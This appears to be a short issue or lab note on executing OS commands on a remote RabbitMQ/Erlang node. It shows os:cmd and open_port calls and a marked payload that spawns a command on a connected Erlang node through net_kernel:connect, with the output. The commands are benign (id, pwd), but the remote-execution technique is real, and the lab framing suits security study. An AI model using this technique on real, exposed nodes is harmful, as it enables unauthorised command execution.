Open nixawk opened 5 years ago
$ sudo apt-get install rabbitmq-server $ sudo service rabbitmq-server start $ sudo rabbitmqctl -q cluster_status
os:cmd runs command in sync mode. open_port in async mode.
$ erl Erlang/OTP 20 [erts-9.2] [source] [64-bit] [smp:1:1] [ds:1:1:10] [async-threads:10] [kernel-poll:false] Eshell V9.2 (abort with ^G) 1> os:cmd('/usr/bin/id'). "uid=1000(debug) gid=1001(hadoopgroup) groups=1001(hadoopgroup),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)\n" 2> erlang:open_port({spawn, "/bin/pwd > /tmp/testfile"}, [{line,80},exit_status,eof,stderr_to_stdout]). #Port<0.385> 3> spawn(fun() -> P5 = erlang:open_port({spawn, "/bin/pwd"}, [stderr_to_stdout, in, exit_status, binary,stream, {line, 255}]), receive {P5, Data} -> io:format("Data ~p~n",[Data]) end end).
$ erl -sname test Erlang/OTP 20 [erts-9.2] [source] [64-bit] [smp:1:1] [ds:1:1:10] [async-threads:10] [kernel-poll:false] Eshell V9.2 (abort with ^G) (test@debug-x)1> > net_kernel:connect('test@debug-x'). true > [[----Payload Start erlang:spawn('test@debug-x', fun() -> P5 = erlang:open_port({spawn, "/bin/pwd"}, [stderr_to_stdout, in, exit_status, binary,stream, {line, 255}]), receive {P5, Data} -> io:format("Data ~p~n",[Data]) end end). ----Payload End]] Data {data,{eol,<<"/home/debug">>}} > init:stop(). ok
Setup an env lab
Elang executes os command
os:cmd runs command in sync mode. open_port in async mode.
How to exploit remote rabbitmq node
Reference